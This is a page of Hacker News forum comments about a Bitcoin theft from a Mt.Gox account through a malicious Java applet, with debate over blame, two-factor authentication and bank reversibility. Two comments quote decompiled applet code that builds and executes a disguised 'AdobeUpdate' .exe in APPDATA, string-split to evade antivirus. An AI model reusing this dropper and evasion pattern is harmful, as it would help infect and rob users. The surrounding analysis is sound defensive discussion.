Live data from Hacker News

How I got robbed of 34 btc on Mt.Gox today

bitcointalk.org

181–190 of 251 posts

Re: How I got robbed of 34 btc on Mt.Gox today

#181

From the source of mtgox-chat.info: Yep, probably an exploit, there aren't many good reasons for a 10x10 applet. Let's download the jar. It contains a single 3.5KB payload. Let's use a Java decompiler (JD-GUI). import java.applet.Applet; import java.applet.AppletContext; import java.io.BufferedInputStream; import java.io.BufferedOutputStream; import java.io.FileNotFoundException; import java.io.FileOutputStream; impo…

>> if (str1 != "yes") Thats some dodgy java code right there. (You should use .equals() )

It's a shame you'be been downvoted even while being correct - I gave you one upvote at least.

Decompile is irrelevant here, the only difference is 'str1' might have been named something different in the original code.

This is java code, so "string" != "string" will usually return true always, as you are checking if the objects are equal and not whether the contents are equal. Depending on the JRE this code runs on, it would give different output. [1]

[1] http://stackoverflow.com/questions/513832/how-do-i-compare-s...

Re: How I got robbed of 34 btc on Mt.Gox today

#183
post #76

Isn't this exactly what Bitcoin was created for - to allow unregulated access to currency? I guess people don't really realize what unregulated actually means - and nor do they realize why you really do want regulated currency. This kind of thing happens all the time with real banks, but with real banks, all transactions can be traced and reversed. Law enforcement can follow the required documentation to find the own…

Fair point, most of the mistakes were on the author's part. MtGox isn't completely blameless, they had a cross-site scripting vulnerability, and they should probably enforce some stronger security around logins from new computers. Something like Steam's approach where every login from a new computer needs to be verified with a confirmation code.

There is no evidence of any cross-site scripting vulnerability - it's a standard case of 'user executes malicious code with full user rights'. If anybody is to blame for that, it's Oracle for letting users shoot themselves in the foot with an 'OK' dialog that all Windows users just click OK on anyway.

MtGox could help prevent this with something like Steam's approach, but once the user has run malicious code there is not much stopping that code from also compromising his email account. Two factor authentication would help here, and MtGox does appear to offer this - the complainer just didn't use it.

Re: How I got robbed of 34 btc on Mt.Gox today

#184
I'm really confused by the title, in particular the "on Mt.Gox" part. Was he "on Mt.Gox['s website]" when he came across this applet? He makes it sound like the exploit was on mt. gox.

If he got a trojan on a third party site that compromised his computer and Mt. Gox's site had nothing to do with it, this title seems a bit libelous. If in fact that's the case, I'd implore HN mods to change the title to something that doesn't unfairly cast aspersions on the Mt.Gox site.

FWIW: I have no bitcoins, I don't fully grok bitcoins, I'm scared of bitcoins, I don't use mt.gox or any vendor

Re: How I got robbed of 34 btc on Mt.Gox today

#185

Earlier quoted context omitted.

It's a long time since I went anywhere near Java (let alone an applet) - but these lines don't look very nice: String str2 = System.getenv("APPDATA"); String str5 = str2 + "\\"; String str6 = "AdobeUpdate-Setup1.84##e"; String str9 = str5.concat(str6.replace("##", ".ex")); Runtime.getRuntime().exec(str9);

I think thats done to fool AV software. - AV software will probably flag up any string which equals "AdobeUpdate-Setup1.exe"

All AV software is about that dumb as far as I know. Anyone who is depending on AV software to protect things like actual money is in serious trouble.

Re: How I got robbed of 34 btc on Mt.Gox today

#186
post #5

I'm not doubting Bitcoin's potential to become a true currency, but unless this type of smash-and-grab situation can be traced/avoided/insured (whatever the right mechanism is) it is going to be extremely hard to make ordinary businesses and people use it. People don't place value in the currency itself, but the system that provides certain security around it.

>but unless this type of smash-and-grab situation can be traced/avoided/insured (whatever the right mechanism is) it is going to be extremely hard to make ordinary businesses and people use it

The solution is probably some kind of secure hardware device/ecosystem run by a third party that the user trusts. The third party can then take legal responsibility for breaches of the hardware using existing market mechanisms.

Running bitcoin on general purpose hardware and software is a security nightmare for anyone who isn't a paranoid geek.

But this isn't a bug, it's a feature. Instant, uncancellable transactions. The problem is just that the feature is nowhere near ready for public use because there hasn't been time for an ecosystem of secure, easy-to-use transaction methods to evolve on top of it.

Re: How I got robbed of 34 btc on Mt.Gox today

#187

I'm really confused by the title, in particular the "on Mt.Gox" part. Was he "on Mt.Gox['s website]" when he came across this applet? He makes it sound like the exploit was on mt. gox. If he got a trojan on a third party site that compromised his computer and Mt. Gox's site had nothing to do with it, this title seems a bit libelous. If in fact that's the case, I'd implore HN mods to change the title to something that…

You have a point. His protestations notwithstanding, Mt. Gox does not appear to bear any responsibility for this at all. What happened was, he let his browser get pwned while he had his Mt. Gox account open in another tab. The coins were taken from his Mt. Gox account, but the security breach was on his end.

Re: How I got robbed of 34 btc on Mt.Gox today

#188

So, how about if you could have a Linux boot image onna stick, properly secured, no Java, several BitCoin apps preinstalled and optimized to boot extremely quickly into what would basically be a sort of BitCoin Wallet dashboard interface. You could plug in the USB, hibernate, flip the switch and be Bitcoin banking within seconds. Then unhibernate and get on with whatever you were doing on your day-to-day OS. That way…

> So, how about if you could have a Linux boot image onna stick, properly > secured, no Java, several BitCoin apps preinstalled and optimized to boot > extremely quickly into what would basically be a sort of BitCoin Wallet > dashboard interface. You could plug in the USB, hibernate, flip the switch > and be Bitcoin banking within seconds. Then unhibernate and get on with > whatever you were doing on your day-to-day…

I think it's clear to everyone that current desktop systems (Windows, but also Linux and MacOS) are not up to the task of securing thousands of dollars of transferable digital currency. Bitcoin depends on you running a secure computing environment. This could be an opportunity for emerging platforms like http://qubes-os.org/.

Re: How I got robbed of 34 btc on Mt.Gox today

#189

Earlier quoted context omitted.

> If someone transfers $50,000 from my personal bank account to someone else's bank account, it's pretty easy for it to be undone. That depends on the timeframe. Once the money has been moved out of that new account again things start getting much harder.

Not really. If a Bank gets a reversal before funds have cleared its pretty straightforward and the stack will almost unwind itself as each Bank reverses credits to the accounts in response to reversals before them. Depending on type of transfer yes there is a date beyond which reversals are not possible but the number of transfers has little to do with it.

Thieves want to work to empty that new account as fast as possible. And they still can't without suckers who volunteer to run a "check-cashing business" or similar scam.

Because banks are held responsible for fraud (from consumer accounts), they work hard to never be the ones holding the bag, so they put up roadblocks in attempts to engage in irreversible transactions. If you say "hey, I opened my account yesterday, now I want to withdraw the $40,000 that just showed up in it, 10's and 20's please" they will nod politely and call a bank manager.

Re: How I got robbed of 34 btc on Mt.Gox today

#190
post #2

So... you ran a Java applet on a domain with mtgox in its name and didn't make sure that site is owned by MtGox? I'm sorry for your loss but what happened is your own fault entirely and I would be surprised if MtGox decides to refund you.

> I would be surprised if MtGox decides to refund you I agree that MtGox shouldn't be doing any kind of refunding in this case. > what happened is your own fault entirely You're blaming the victim. If I'm walking down a dark alley and someone pulls a gun on me and takes my wallet, is it my fault because I decided to walk down a dark alley? Not at all. The only person at fault here is the cracker who perpetrated the s…

Will you demand compensation from your local authorities because they did not prevent you walking into a dark alley?
Post reply on HN